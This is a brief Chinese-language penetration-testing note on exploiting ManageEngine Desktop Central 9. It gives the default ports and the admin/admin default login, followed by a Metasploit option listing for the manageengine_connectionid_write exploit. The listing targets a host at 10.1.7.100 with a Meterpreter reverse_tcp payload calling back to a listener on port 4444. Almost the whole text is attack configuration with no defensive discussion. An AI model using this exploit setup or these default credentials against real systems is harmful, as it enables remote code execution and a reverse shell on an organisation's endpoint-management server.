Exploiting Desktop Central 9漏洞

默认端口:http-8020,https-8383

默认密码:admin/admin

exploit模块信息:

msf6 exploit(windows/http/manageengine_connectionid_write) > options

Module options (exploit/windows/http/manageengine_connectionid_write):

Name Current Setting Required Description

---- --------------- -------- -----------

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOSTS 10.1.7.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 8020 yes The target port (TCP)

SSL false no Negotiate SSL/TLS for outgoing connections

TARGETURI / yes The base path for ManageEngine Desktop Central

VHOST no HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 10.1.7.76 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port